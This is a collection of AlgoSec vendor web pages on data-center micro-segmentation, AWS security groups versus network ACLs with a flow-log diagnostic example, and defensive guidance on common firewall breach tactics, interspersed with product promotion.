- Segregate the systems processing sensitive data into their own segments. You may have to do this anyway for regulatory reasons.
- Segregate networks connecting to client systems (desktops, laptops, wireless networks) into "human-zone" segments. Client systems are often the entry points of malware, and are always the source of malicious insider attacks.

Then, place the remaining servers supporting each application, each in its own segment.
Doing so will save you the need to write explicit policy rules to allow traffic that is internal to only one business application.

Example segment within a data center

Micro-segmentation Blueprint: Creating the Filtering Policy

Once the segments are defined, we need to write the policy. Traffic confined to a segment is automatically allowed, so we don't need to worry about it anymore. We just need to write policy for traffic crossing micro-segment boundaries. Eventually, the last rule on the policy must be a default-deny: "from anywhere to anywhere, with any service – DENY." However, enforcing such a rule in the early days of the micro-segmentation project, before all the rest of the policy is written, risks breaking many applications' communications. So start with a (totally insecure) default-allow rule until your policy is ready, and then switch to a default-deny on "D-Day" ("deny-day"). We'll discuss D-Day shortly. What types of rules are we going to be writing?

- Cross-segment flows – allowing traffic between segments: e.g., allow the eCommerce servers to access the credit-card
- Flows to/from outside the data center – e.g., allow employees in the finance department to connect to financial data within the data center from their machines in the human-zone, or allow access from the Internet to the front-end eCommerce web servers.

Users outside the data center need to access data within the data center

Micro-segmentation Blueprint: Default Allow – with Logging

To avoid major connectivity disruptions, start your micro-segmentation project gently. Instead of writing a "DENY" rule at the end of the policy, write an "ALLOW" rule – which is clearly insecure – but turn on logging for this ALLOW rule. This creates a log of all connections that match the default-allow rule. Initially you will receive many log entries from the default-allow rule; your goal in the project is to eliminate them.
To do this, you go over the applications you discovered earlier, write the policy rules that support each application's cross-segment flows, and place them above the default-allow rule. This means that the traffic of each application you handle will no longer match the default-allow rule (it will match the new rules you wrote), and the amount of default-allow logs will decrease. Keep adding rules, application by application, until the final allow rule is not generating any more logs. At that point, you reach the final milestone in the project: D-Day.

Micro-segmentation Blueprint: Preparing for "D-Day"

Once logging generated by the default-allow rule ceases to indicate new flows that need to be added to your filtering policy, you can start preparing for "D-Day." This is the day that you flip the switch and change the final rule from "default ALLOW" to "default DENY." Once you do that, all the undiscovered traffic is going to be denied by the filtering fabric, and you will finally have a secured, micro-segmented data center. This is a big deal! However, you should realize that D-Day is going to cause a big organizational change. From this day forward, every application developer whose application requires new traffic to cross the data center will need to ask for permission to allow this traffic; they will need to follow a process, which includes opening a change request, and then wait for the change to be implemented. The free-wheeling days are over. You need to prepare for D-Day. Consider steps such as:

- Get management buy-in
- Communicate the change across the organization
- Set a change control window
- Have "all hands on deck" on D-Day to quickly correct anything that may have been missed and causes applications to break

Micro-segmentation Blueprint: Change Requests & Compliance

Notice that after D-Day, any change in application connectivity requires filing a "change request".
When the information security team is evaluating a change request, they need to check whether the request is in line with the "acceptable traffic" policy. A common method for managing policy at the high level is to use a table, where each row represents a segment, and every column represents a segment. Each cell in the table lists all the services that are allowed from its "row" segment to its "column" segment. Keeping this table in a machine-readable format, such as an Excel spreadsheet, enables software systems to run a what-if risk check that compares each change request with the acceptable policy, and flags any discrepancies before the new rules are deployed. Such a what-if risk check is also important for regulatory compliance. Regulations such as PCI and ISO 27001 require organizations to define such a policy, and to compare themselves to it; demonstrating the policy is often part of the certification or audit.

Enabling Micro-segmentation with AlgoSec

The AlgoSec Security Management Suite (ASMS) makes it easy to define and enforce your micro-segmentation strategy inside the data center, ensuring that it does not block critical business services and does meet compliance requirements. AlgoSec's powerful AutoDiscovery capabilities help you understand the network flows in your organization. You can automatically connect the recognized traffic flows to the business applications that use them. Once the segments are established, AlgoSec seamlessly manages the network security policy across your entire hybrid network estate. AlgoSec proactively checks every proposed firewall rule change request against the segmentation strategy to ensure that the change doesn't break the segmentation strategy, introduce risk, or violate compliance requirements.
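The segment-to-segment table described above can be kept machine-readable and consulted programmatically. A minimal sketch of such a what-if check follows; the segment names and services are illustrative assumptions, not from the source:

```python
# High-level policy matrix: (from_segment, to_segment) -> allowed services.
# Traffic that stays inside one segment is implicitly allowed.
ALLOWED = {
    ("human-zone", "ecommerce-web"): {"HTTPS"},
    ("ecommerce-web", "cardholder-data"): {"TCP/3306"},
}

def check_change_request(src_seg, dst_seg, service):
    """What-if risk check: does the requested flow comply with the matrix?"""
    if src_seg == dst_seg:
        return True  # intra-segment traffic is allowed by definition
    return service in ALLOWED.get((src_seg, dst_seg), set())

# A compliant request passes; a request that bypasses the web tier is flagged
# for review before any rule is deployed.
check_change_request("human-zone", "ecommerce-web", "HTTPS")       # compliant
check_change_request("human-zone", "cardholder-data", "TCP/3306")  # flagged
```

Keeping the matrix in a spreadsheet and loading it into a structure like `ALLOWED` is what makes the automated pre-deployment comparison possible.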
AlgoSec enforces micro-segmentation by:

- Generating a custom report on compliance enforced by the micro-segmentation policy
- Identifying unprotected network flows that do not cross any firewall and are not filtered for an application
- Automatically identifying changes that violate the micro-segmentation strategy
- Automatically implementing network security changes
- Automatically validating changes

Security zones in AlgoSec's AppViz

Want to learn more? Get a personal demo.

About AlgoSec

AlgoSec, a global cybersecurity leader, empowers organizations to secure application connectivity by automating connectivity flows and security policy, anywhere. The AlgoSec platform enables the world's most complex organizations to gain visibility, reduce risk and process changes at zero-touch across the hybrid network. AlgoSec's patented application-centric view of the hybrid network enables business owners, application owners, and information security professionals to talk the same language, so organizations can deliver business applications faster while achieving a heightened security posture. Over 1,800 of the world's leading organizations trust AlgoSec to help secure their most critical workloads across public cloud, private cloud, containers, and on-premises networks, while taking advantage of almost two decades of leadership in Network Security Policy Management. See what securely accelerating your digital transformation, move-to-cloud, infrastructure modernization, or micro-segmentation initiatives looks like at www.algosec.com

Want to learn more about how AlgoSec can help enable micro-segmentation? Schedule a demo.

  • AlgoSec application discovery Enhance the discovery of your network applications | AlgoSec

Streamline network management with AlgoSec Application Discovery. Gain visibility into application connectivity to optimize performance and enhance security policies.

AlgoSec application discovery: Enhance the discovery of your network applications

  • Master the Zero Trust strategy for improved cybersecurity | AlgoSec

Learn best practices to secure your cloud environment and deliver applications securely

Webinars

Master the Zero Trust strategy for improved cybersecurity

Learn how to implement zero trust security into your business

In today's digital world, cyber threats are becoming more complex and sophisticated. Businesses must adopt a proactive approach to cybersecurity to protect their sensitive data and systems. This is where zero trust security comes in – a security model that requires every user, device, and application to be verified before granting access. If you're looking to implement zero trust security in your business or want to know more about how it works, you'll want to watch this webinar. AlgoSec co-Founder and CTO Avishai Wool will discuss the benefits of zero trust security and provide you with practical tips on how to implement this security model in your organization.

March 15, 2023
Prof. Avishai Wool, CTO & Co-Founder, AlgoSec

Relevant resources:
- Protecting Your Network's Precious Jewels with Micro-Segmentation, Kyle Wickert, AlgoSec (video)
- Professor Wool – Introduction to Microsegmentation (video)
- Five Practical Steps to Implementing a Zero-Trust Network

  • AlgoSec | NACL best practices: How to combine security groups with network ACLs effectively

Like all modern cloud providers, Amazon adopts the shared responsibility model for cloud security. Amazon guarantees secure...

AWS

NACL best practices: How to combine security groups with network ACLs effectively

Prof. Avishai Wool
2 min read
Published 8/28/23

Like all modern cloud providers, Amazon adopts the shared responsibility model for cloud security. Amazon guarantees secure infrastructure for Amazon Web Services, while AWS users are responsible for maintaining secure configurations. That requires using multiple AWS services and tools to manage traffic. You'll need to develop a set of inbound rules for incoming connections between your Amazon Virtual Private Cloud (VPC) and all of its Elastic Compute (EC2) instances and the rest of the Internet. You'll also need to manage outbound traffic with a series of outbound rules. Your Amazon VPC provides you with several tools to do this. The two most important ones are security groups and Network Access Control Lists (NACLs). Security groups are stateful firewalls that secure inbound traffic for individual EC2 instances. Network ACLs are stateless firewalls that secure inbound and outbound traffic for VPC subnets. Managing AWS VPC security requires configuring both of these tools appropriately for your unique security risk profile. This means planning your security architecture carefully to align it with the rest of your security framework. For example, your firewall rules impact the way AWS Identity and Access Management (IAM) handles user permissions. Some (but not all) IAM features can be implemented at the network firewall layer of security. Before you can manage AWS network security effectively, you must familiarize yourself with how AWS security tools work and what sets them apart.
Everything you need to know about security groups vs NACLs

AWS security groups explained:

Every AWS account has a single default security group assigned to the default VPC in every Region. It is configured to allow inbound traffic from network interfaces assigned to the same group, using any protocol and any port. It also allows all outbound traffic using any protocol and any port. Your default security group will also allow all outbound IPv6 traffic once your VPC is associated with an IPv6 CIDR block. You can't delete the default security group, but you can create new security groups and assign them to AWS EC2 instances. Each security group can only contain up to 60 rules, but you can set up to 2,500 security groups per Region. You can associate many different security groups with a single instance, potentially combining hundreds of rules. These are all allow rules that allow traffic to flow according to the ports and protocols specified. For example, you might set up a rule that authorizes inbound traffic over IPv6 for Linux SSH commands and sends it to a specific destination. This could be different from the destination you set for other TCP traffic. Security groups are stateful, which means that requests sent from your instance will be allowed to flow regardless of inbound traffic rules. Similarly, VPC security groups automatically allow responses to inbound traffic to flow out regardless of outbound rules. However, since security groups do not support deny rules, you can't use them to block a specific IP address from connecting with your EC2 instance. Be aware that Amazon EC2 automatically blocks email traffic on port 25 by default – but this is not included as a specific rule in your default security group.

AWS NACLs explained:

Your VPC comes with a default NACL configured to automatically allow all inbound and outbound network traffic. Unlike security groups, NACLs filter traffic at the subnet level.
That means that Network ACL rules apply to every EC2 instance in the subnet, allowing users to manage AWS resources more efficiently. Every subnet in your VPC must be associated with a Network ACL. Any single Network ACL can be associated with multiple subnets, but each subnet can only be assigned to one Network ACL at a time. Every rule has its own rule number, and Amazon evaluates rules in ascending order. The most important characteristic of NACL rules is that they can deny traffic. Amazon evaluates these rules when traffic enters or leaves the subnet – not while it moves within the subnet. You can access more granular data on data flows using VPC flow logs. Since Amazon evaluates NACL rules in ascending order, make sure that you place deny rules earlier in the table than rules that allow traffic to multiple ports. You will also have to create specific rules for IPv4 and IPv6 traffic – AWS treats these as two distinct types of traffic, so rules that apply to one do not automatically apply to the other. Once you start customizing NACLs, you will have to take into account the way they interact with other AWS services. For example, Elastic Load Balancing won’t work if your NACL contains a deny rule excluding traffic from 0.0.0.0/0 or the subnet’s CIDR. You should create specific inclusions for services like Elastic Load Balancing, AWS Lambda, and AWS CloudWatch. You may need to set up specific inclusions for third-party APIs, as well. You can create these inclusions by specifying ephemeral port ranges that correspond to the services you want to allow. For example, NAT gateways use ports 1024 to 65535. This is the same range covered by AWS Lambda functions, but it’s different than the range used by Windows operating systems. When creating these rules, remember that unlike security groups, NACLs are stateless. That means that when responses to allowed traffic are generated, those responses are subject to NACL rules. 
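NACL evaluation can be reasoned about with a small simulation: rules are checked in ascending rule-number order, the first match wins, and the implicit final rule denies. This is a sketch only; the rule numbers, CIDRs, and ports are illustrative, and matching is simplified to a single port per rule:

```python
import ipaddress

def evaluate_nacl(rules, src_ip, port):
    """Evaluate NACL-style rules in ascending rule-number order.
    The first rule whose CIDR and port match decides; if nothing
    matches, the implicit '*' rule at the end denies the traffic."""
    for rule in sorted(rules, key=lambda r: r["number"]):
        if (ipaddress.ip_address(src_ip) in ipaddress.ip_network(rule["cidr"])
                and port == rule["port"]):
            return rule["action"]
    return "deny"  # implicit default-deny

rules = [
    # Deny one suspicious range first (lower number = evaluated earlier) ...
    {"number": 90,  "cidr": "198.51.100.0/24", "port": 443, "action": "deny"},
    # ... then allow HTTPS from everywhere else.
    {"number": 100, "cidr": "0.0.0.0/0",       "port": 443, "action": "allow"},
]
evaluate_nacl(rules, "198.51.100.7", 443)  # hits rule 90 first: denied
evaluate_nacl(rules, "203.0.113.5", 443)   # falls through to rule 100: allowed
```

Placing the deny at a lower rule number is exactly why Amazon's ordering guidance matters: swap the two numbers and the deny would never fire.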
Misconfigured NACLs deny traffic responses that should be allowed, leading to errors, reduced visibility, and potential security vulnerabilities.

How to configure and map NACL associations

A major part of optimizing NACL architecture involves mapping the associations between security groups and NACLs. Ideally, you want to enforce a specific set of rules at the subnet level using NACLs, and a different set of instance-specific rules at the security group level. Keeping these rulesets separate will prevent you from setting inconsistent rules and accidentally causing unpredictable performance problems. The first step in mapping NACL associations is using the Amazon VPC console to find out which NACL is associated with a particular subnet. Since NACLs can be associated with multiple subnets, you will want to create a comprehensive list of every association and the rules they contain.

To find out which NACL is associated with a subnet:

1. Open the Amazon VPC console.
2. Select Subnets in the navigation pane.
3. Select the subnet you want to inspect.
4. The Network ACL tab will display the ID of the ACL associated with that subnet, and the rules it contains.

To find out which subnets are associated with a NACL:

1. Open the Amazon VPC console.
2. Select Network ACLs in the navigation pane.
3. Click over to the column entitled Associated With.
4. Select a Network ACL from the list.
5. Look for Subnet associations on the details pane and click on it. The pane will show you all subnets associated with the selected Network ACL.

Now that you know the difference between security groups and NACLs and can map the associations between your subnets and NACLs, you're ready to implement some security best practices that will help you strengthen and simplify your network architecture.
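The same mapping can be scripted instead of clicked through. The sketch below assumes a response shaped like the EC2 DescribeNetworkAcls output (with boto3, `ec2.describe_network_acls()` returns this structure); the IDs here are made up for illustration:

```python
def map_subnets_to_nacls(response):
    """Build {subnet_id: network_acl_id} from a DescribeNetworkAcls-shaped
    response. Each subnet appears once, since a subnet can be associated
    with only one NACL at a time."""
    mapping = {}
    for nacl in response["NetworkAcls"]:
        for assoc in nacl.get("Associations", []):
            mapping[assoc["SubnetId"]] = nacl["NetworkAclId"]
    return mapping

# Example response shape (IDs are illustrative, not real resources)
response = {
    "NetworkAcls": [
        {"NetworkAclId": "acl-0a1b2c3d",
         "Associations": [
             {"SubnetId": "subnet-111"},
             {"SubnetId": "subnet-222"},
         ]},
        {"NetworkAclId": "acl-9f8e7d6c",
         "Associations": [{"SubnetId": "subnet-333"}]},
    ]
}
map_subnets_to_nacls(response)
# {'subnet-111': 'acl-0a1b2c3d', 'subnet-222': 'acl-0a1b2c3d',
#  'subnet-333': 'acl-9f8e7d6c'}
```

A map like this is a convenient starting point for the comprehensive association list the text recommends keeping.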
5 best practices for AWS NACL management

Pay close attention to default NACLs, especially at the beginning

Since every VPC comes with a default NACL, many AWS users jump straight into configuring their VPC and creating subnets, leaving NACL configuration for later. The problem here is that every subnet associated with your VPC will inherit the default NACL. This allows all traffic to flow into and out of the network. Going back and building a working security policy framework will be difficult and complicated – especially if adjustments are still being made to your subnet-level architecture. Taking time to create custom NACLs and assign them to the appropriate subnets as you go will make it much easier to keep track of changes to your security posture as you modify your VPC moving forward.

Implement a two-tiered system where NACLs and security groups complement one another

Security groups and NACLs are designed to complement one another, yet not every AWS VPC user configures their security policies accordingly. Mapping out your assets can help you identify exactly what kind of rules need to be put in place, and may help you determine which tool is the best one for each particular case. For example, imagine you have a two-tiered web application with web servers in one security group and a database in another. You could establish inbound NACL rules that allow external connections to your web servers from anywhere in the world (enabling port 443 connections) while strictly limiting access to your database (by only allowing port 3306 connections for MySQL).

Look out for ineffective, redundant, and misconfigured deny rules

Amazon recommends placing deny rules first in the sequential list of rules that your NACL enforces. Since you're likely to enforce multiple deny rules per NACL (and multiple NACLs throughout your VPC), you'll want to pay close attention to the order of those rules, looking for conflicts and misconfigurations that will impact your security posture.
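Because rules are evaluated in ascending rule-number order, a deny rule numbered after a broader allow on the same port can never match. A small, illustrative shadowing check (the rule data is made up):

```python
import ipaddress

def shadowed_denies(rules):
    """Return rule numbers of deny rules that can never fire because an
    earlier (lower-numbered) allow rule already covers their CIDR and port."""
    ordered = sorted(rules, key=lambda r: r["number"])
    shadowed = []
    for i, rule in enumerate(ordered):
        if rule["action"] != "deny":
            continue
        net = ipaddress.ip_network(rule["cidr"])
        for earlier in ordered[:i]:
            if (earlier["action"] == "allow"
                    and earlier["port"] == rule["port"]
                    and net.subnet_of(ipaddress.ip_network(earlier["cidr"]))):
                shadowed.append(rule["number"])
                break
    return shadowed

rules = [
    {"number": 100, "cidr": "0.0.0.0/0",       "port": 443, "action": "allow"},
    {"number": 200, "cidr": "198.51.100.0/24", "port": 443, "action": "deny"},
]
shadowed_denies(rules)  # rule 200 is placed too late to ever match
```

Running a check like this across your NACLs is one concrete way to surface the "ineffective deny rule" misconfiguration described above.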
Similarly, you should pay close attention to the way security group rules interact with your NACLs. Even misconfigurations that are harmless from a security perspective may end up impacting the performance of your instance, or causing other problems. Regularly reviewing your rules is a good way to prevent these mistakes from occurring.

Limit outbound traffic to the required ports or port ranges

When creating a new NACL, you have the ability to apply inbound or outbound restrictions. There may be cases where you want to set outbound rules that allow traffic from all ports. Be careful, though. This may introduce vulnerabilities into your security posture. It's better to limit access to the required ports, or to specify the corresponding port range for outbound rules. This applies the principle of least privilege to outbound traffic and limits the risk of unauthorized access that may occur at the subnet level.

Test your security posture frequently and verify the results

How do you know if your particular combination of security groups and NACLs is optimal? Testing your architecture is a vital step towards making sure you haven't left out any glaring vulnerabilities. It also gives you a good opportunity to address misconfiguration risks. This doesn't always mean actively running penetration tests with experienced red team consultants, although that's a valuable way to ensure best-in-class security. It also means taking time to validate your rules by running small tests with an external device. Consider using AWS flow logs to trace the way your rules direct traffic and using that data to improve your work.

How to diagnose security group rules and NACL rules with flow logs

Flow logs allow you to verify whether your firewall rules follow security best practices effectively. You can follow data ingress and egress and observe how data interacts with your AWS security rule architecture at each step along the way.
This gives you clear visibility into how efficient your route tables are, and may help you configure your internet gateways for optimal performance. Before you can use the flow log CLI, you will need to create an IAM role that includes a policy granting users the permission to create, configure, and delete flow logs. Flow logs are available at three distinct levels, each accessible through its own console:

- Network interfaces
- VPCs
- Subnets

You can use the ping command from an external device to test the way your instance's security group and NACLs interact. Your security group rules (which are stateful) will allow the response ping from your instance to go through. Your NACL rules (which are stateless) will not allow the outbound ping response to travel back to your device. You can look for this activity through a flow log query. Here is a quick tutorial on how to create a flow log query to check your AWS security policies. First you'll need to create a flow log in the AWS CLI. This example captures all traffic for a specified network interface and delivers the flow logs to a CloudWatch log group with permissions specified in the IAM role:

aws ec2 create-flow-logs \
  --resource-type NetworkInterface \
  --resource-ids eni-1235b8ca123456789 \
  --traffic-type ALL \
  --log-group-name my-flow-logs \
  --deliver-logs-permission-arn arn:aws:iam::123456789101:role/publishFlowLogs

Assuming your test pings represent the only traffic flowing between your external device and EC2 instance, you'll get two records that look like this:

2 123456789010 eni-1235b8ca123456789 203.0.113.12 172.31.16.139 0 0 1 4 336 1432917027 1432917142 ACCEPT OK
2 123456789010 eni-1235b8ca123456789 172.31.16.139 203.0.113.12 0 0 1 4 336 1432917094 1432917142 REJECT OK

To parse this data, you'll need to familiarize yourself with flow log syntax.
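Records like the two above are space-separated fields in a fixed order, so a minimal parser is straightforward (field names follow the version-2 default format):

```python
# Field order of a default (version 2) VPC flow log record
FIELDS = ["version", "account_id", "interface_id", "srcaddr", "dstaddr",
          "srcport", "dstport", "protocol", "packets", "bytes",
          "start", "end", "action", "log_status"]

def parse_flow_log(record):
    """Split one default flow log record into a {field: value} dict."""
    return dict(zip(FIELDS, record.split()))

rec = parse_flow_log(
    "2 123456789010 eni-1235b8ca123456789 172.31.16.139 203.0.113.12 "
    "0 0 1 4 336 1432917094 1432917142 REJECT OK")
rec["action"]    # 'REJECT': the stateless NACL blocked the ping response
rec["protocol"]  # '1': ICMP, per the IANA protocol numbers
```

With records in this form, you can filter for REJECT entries programmatically instead of scanning the raw log lines by eye.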
Default flow log records contain 14 fields, although expanded custom queries can return more than double that number:

- Version tells you the version currently in use. Default flow log requests use version 2; expanded custom requests may use version 3 or 4.
- Account-id tells you the account ID of the owner of the network interface that traffic is traveling through. The record may display as unknown if the network interface is part of an AWS service like a Network Load Balancer.
- Interface-id shows the unique ID of the network interface for the traffic currently under inspection.
- Srcaddr shows the source of incoming traffic, or the address of the network interface for outgoing traffic. For a network interface, this is always its private IPv4 address.
- Dstaddr shows the destination of outgoing traffic, or the address of the network interface for incoming traffic. For a network interface, this is always its private IPv4 address.
- Srcport is the source port for the traffic under inspection.
- Dstport is the destination port for the traffic under inspection.
- Protocol refers to the corresponding IANA traffic protocol number.
- Packets describes the number of packets transferred.
- Bytes describes the number of bytes transferred.
- Start shows the time when the first data packet was received. This could be up to one minute after the network interface transmitted or received the packet.
- End shows the time when the last data packet was received. This can be up to one minute after the network interface transmitted or received the data packet.
- Action describes what happened to the traffic under inspection: ACCEPT means the traffic was allowed to pass; REJECT means the traffic was blocked, typically by security groups or NACLs.
- Log-status confirms the status of the flow log: OK means data is logging normally.
NODATA means no network traffic to or from the network interface was detected during the specified interval.
SKIPDATA means some flow log records are missing, usually due to internal capacity constraints or other errors.

Going back to the example above, the flow log output shows that a user sent a command from a device with the IP address 203.0.113.12 to the network interface's private IP address, 172.31.16.139. The security group's inbound rules allowed the ICMP traffic through, producing an ACCEPT record. However, the NACL, because it is stateless, did not let the ping response go through. This generated the REJECT record that followed immediately after. If you configure your NACL to permit outbound ICMP traffic and run this test again, the second flow log record will change to ACCEPT.

Amazon Web Services (AWS) is one of the most popular options for organizations looking to migrate their business applications to the cloud. It's easy to see why: AWS offers high-capacity, scalable, and cost-effective storage, and a flexible, shared-responsibility approach to security. Essentially, AWS secures the infrastructure, and you secure whatever you run on that infrastructure. However, this model does raise some challenges. What exactly do you have control over? How can you customize your AWS infrastructure so that it isn't just secure today, but will continue delivering robust, easily managed security in the future?

The basics: security groups

AWS offers virtual firewalls for filtering the traffic that crosses organizations' cloud network segments. These firewalls are managed using a concept called security groups: policies, or lists of security rules, applied to an instance – a virtualized computer in the AWS estate.
AWS Security Groups are not identical to traditional firewalls; they have some unique characteristics and functionality that you should be aware of. We've discussed them in detail in video lesson 1: the fundamentals of AWS Security Groups, but the crucial points are as follows.

First, security groups do not deny traffic – all security group rules are positive, and allow traffic. Second, while a security group rule can specify a traffic source or a destination, it cannot specify both on the same rule. This is because AWS always sets the unspecified side (source or destination) to the instance to which the group is applied. Finally, a single security group can be applied to multiple instances, or multiple security groups can be applied to a single instance: AWS is very flexible. This flexibility is one of the unique benefits of AWS, allowing organizations to build bespoke security policies across different functions and even operating systems, mixing and matching them to suit their needs.

Adding Network ACLs into the mix

To further enhance and enrich its security filtering capabilities, AWS also offers a feature called Network Access Control Lists (NACLs). Like a security group, each NACL is a list of rules, but there are two important differences between NACLs and security groups.

The first difference is that NACLs are not directly tied to instances; each NACL is associated with a subnet within your AWS virtual private cloud. This means that the rules in a NACL apply to all of the instances within that subnet, in addition to the rules from the security groups. A specific instance therefore inherits all the rules from the security groups associated with it, plus the rules from the NACL optionally associated with the subnet containing that instance. As a result, NACLs have a broader reach, and affect more instances than a security group does.
The second difference is that NACL rules include an explicit action, so you can write 'deny' rules – for example, to block traffic from a particular set of IP addresses known to be compromised. The ability to write 'deny' actions is a crucial part of NACL functionality.

It's all about the order

Once you can write both 'allow' rules and 'deny' rules, the order of the rules becomes important: if you switch the order of a 'deny' and an 'allow' rule, you can change your filtering policy quite dramatically. To manage this, AWS uses the concept of a 'rule number' within each NACL. By specifying rule numbers, you set the order in which the rules are evaluated: you can choose which traffic you deny at the outset, and which you then actively allow. With NACLs, then, you can manage security tasks in a way that you cannot with security groups alone.

However, we pointed out earlier that an instance inherits security rules from both its security groups and the NACL – so how do these interact? The order in which rules are evaluated is as follows. For inbound traffic, AWS's infrastructure first assesses the NACL rules. If traffic gets through the NACL, all the security groups associated with that specific instance are evaluated; the order within and among the security groups is unimportant, because they are all 'allow' rules. For outbound traffic, this order is reversed: the traffic is first evaluated against the security groups, and then against the NACL associated with the relevant subnet.

You can see me explain this topic in person in my new whiteboard video:

Schedule a demo Related Articles Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read 5 Multi-Cloud Environments Cloud Security Mar 19, 2023 · 2 min read Convergence didn't fail, compliance did.
Mar 19, 2023 · 2 min read
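The inbound evaluation order described in the article above – NACL first, in rule-number order with explicit allow/deny actions, then the allow-only security groups in any order – can be sketched as a toy model (the rule representations here are hypothetical, not AWS data structures):

```python
# Toy model (not AWS code) of inbound rule evaluation:
# the NACL is checked first, in rule-number order, with explicit
# allow/deny actions; security groups are checked second and contain
# only 'allow' rules, so their order does not matter.

def nacl_allows(nacl_rules, port):
    """nacl_rules: list of (rule_number, action, port), checked in order."""
    for _, action, rule_port in sorted(nacl_rules):
        if rule_port == port:
            return action == "allow"   # first matching rule decides
    return False  # no matching rule: traffic is dropped

def security_groups_allow(groups, port):
    """groups: list of sets of allowed ports; a match in any group suffices."""
    return any(port in group for group in groups)

def inbound_allowed(nacl_rules, groups, port):
    # NACL first, then security groups.
    return nacl_allows(nacl_rules, port) and security_groups_allow(groups, port)

nacl = [(100, "deny", 22), (200, "allow", 22), (300, "allow", 443)]
sgs = [{22, 443}]
print(inbound_allowed(nacl, sgs, 22))   # False: rule 100 denies before 200 allows
print(inbound_allowed(nacl, sgs, 443))  # True
```

Note how swapping the rule numbers of the two port-22 NACL rules would flip the first result – exactly the ordering sensitivity the article describes.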

  • AlgoSec | How To Prevent Firewall Breaches (The 2024 Guide)

How To Prevent Firewall Breaches (The 2024 Guide) Tsippi Dach · 2 min read · Published 1/11/24

Properly configured firewalls are vital to any comprehensive cybersecurity strategy. However, even the most robust configurations can be vulnerable to exploitation by attackers. No single security measure offers absolute protection against all cyber threats and data security risks. To mitigate these risks, it's crucial to understand how cybercriminals exploit firewall vulnerabilities: the more you know about their tactics, techniques, and procedures, the better equipped you are to implement security policies that successfully block unauthorized access to network assets.

This guide covers the common cyber threats that target enterprise firewall systems, with the goal of helping you understand how attackers exploit misconfigurations and human vulnerabilities. Use this information to protect your network from a firewall breach.

Understanding 6 Tactics Cybercriminals Use to Breach Firewalls

1. DNS Leaks

Your firewall's primary purpose is to make sure unauthorized users do not gain access to your private network and the sensitive information it contains. But firewall rules can go both ways – preventing sensitive data from leaving the network is just as important. If enterprise security teams neglect to configure their firewalls to inspect outgoing traffic, cybercriminals can intercept this traffic and use it to find gaps in your security systems. DNS traffic is particularly susceptible to this approach because it shows a list of websites users on your network regularly visit.
A hacker could use this information to create a spoofed version of a frequently visited website. For example, they might notice your organization's employees visit a third-party website to attend training webinars. Registering a fake version of the training website and collecting employee login credentials would be simple. If your firewall doesn't inspect DNS data and confirm connections to new IP addresses, you may never know.

DNS leaks may also reveal the IP addresses and endpoint metadata of the device used to make an outgoing connection. This gives cybercriminals the ability to see what kind of hardware your organization's employees use to connect to external websites. With that information in hand, impersonating managed service providers or other third-party partners is easy. Some DNS leaks even contain timestamp data, telling attackers exactly when users requested access to external web assets.

How to protect yourself against DNS leaks

Proper firewall configuration is key to preventing DNS-related security incidents. Your organization's firewalls should provide observability and access control for both incoming and outgoing traffic. Connections to servers known for hosting malware and cybercrime assets should be blocked entirely, and connections to servers without a known reputation should be monitored closely. In a Zero Trust environment, even connections to known servers should face scrutiny under an identity-based security framework.

Don't forget that apps can connect to external resources, too. Consider deploying web application firewalls configured to prevent DNS leaks when connecting to third-party assets and servers. You may also wish to update your security policy to require employees to use VPNs when connecting to external resources. An encrypted VPN connection can prevent DNS information from leaking, making it much harder for cybercriminals to conduct reconnaissance on potential targets using DNS data.

2. Encrypted Injection Attacks

Older, simpler firewalls analyze traffic by looking at data packet metadata. Metadata provides clear evidence of certain denial-of-service attacks, clear violations of network security policy, and some forms of malware and ransomware, but these firewalls do not conduct deep packet inspection to identify the kind of content passing through. This gives cybercriminals an easy way to bypass firewall rules and intrusion prevention systems: encryption. If malicious content is encrypted before it hits the firewall, it may go unnoticed by simple firewall rules. Only next-generation firewalls capable of handling encrypted data packets can determine whether this kind of traffic is secure.

Cybercriminals often deliver encrypted injection attacks through email. Phishing emails may trick users into clicking on a malicious link that injects encrypted code into the endpoint device. The script won't decode and run until after it passes the data security threshold posed by the firewall. After that, it is free to search for personal data, credit card information, and more. Many of these attacks also bypass antivirus controls that don't know how to handle encrypted data. Task automation solutions like Windows PowerShell are also susceptible to these kinds of attacks. Even sophisticated detection-based security solutions may fail to recognize encrypted injection attacks if they don't have the keys necessary to decrypt incoming data.

How to protect yourself against encrypted injection attacks

Deep packet inspection is one of the most valuable features next-generation firewalls provide to security teams. Industry-leading firewall vendors equip their products with the ability to decrypt and inspect traffic. This allows the firewall to prevent malicious content from entering the network through encrypted traffic, and it can also prevent sensitive encrypted data – like login credentials – from leaving the network.
These capabilities are unique to next-generation firewalls and can't be easily replicated with other solutions. To inspect encrypted traffic, manufacturers and developers have to equip their firewalls with public-key cryptography capabilities and obtain data from certificate authorities.

3. Compromised Public Wi-Fi

Public Wi-Fi networks are a well-known security threat for individuals and organizations alike. Anyone who logs into a password-protected account on public Wi-Fi at an airport or coffee shop runs the risk of sending their authentication information directly to hackers. Compromised public Wi-Fi also presents a lesser-known threat to security teams at enterprise organizations: it may help hackers breach firewalls. If a remote employee logs into a business account or other asset from a compromised public Wi-Fi connection, hackers can see all the data transmitted through that connection. This may give them the ability to steal account login details or spoof endpoint devices and defeat multi-factor authentication.

Even password-protected private Wi-Fi connections can be abused in this way. Some Wi-Fi networks still use outdated WEP and WPA security protocols with well-known vulnerabilities; exploiting these weaknesses to take control of a WEP- or WPA-protected network is trivial for hackers. The newer WPA2 and WPA3 standards are much more resilient against these kinds of attacks. While public Wi-Fi dangers usually bring remote workers and third-party service vendors to mind, on-premises networks are just as susceptible: nothing prevents a hacker from gaining access to public Wi-Fi networks in retail stores, receptions, or other areas frequented by customers and employees.

How to protect yourself against compromised public Wi-Fi attacks

First, enforce security policies that only allow Wi-Fi traffic secured by the WPA2 and WPA3 protocols. Hardware Wi-Fi routers that do not support these protocols must be replaced.
This grants a minimum level of security to protected Wi-Fi networks. Next, all remote connections made over public Wi-Fi networks must use a secure VPN. This encrypts the data that the public Wi-Fi router handles, making it impossible for a hacker to intercept without obtaining the VPN's secret decryption key. This doesn't guarantee your network will be safe from attacks, but it improves your security posture considerably.

4. IoT Infrastructure Attacks

Smartwatches, voice-operated speakers, and many automated office products make up the Internet of Things (IoT) segment of your network. Your organization may be using cloud-enriched access control systems, cost-efficient smart heating systems, and much more; any Wi-Fi-enabled hardware capable of automation can be included in this category. However, these devices often fly under the radar of security teams' detection tools, which tend to focus on user traffic. If hackers compromise one of these devices, they may be able to move laterally through the network until they arrive at a segment that handles sensitive information.

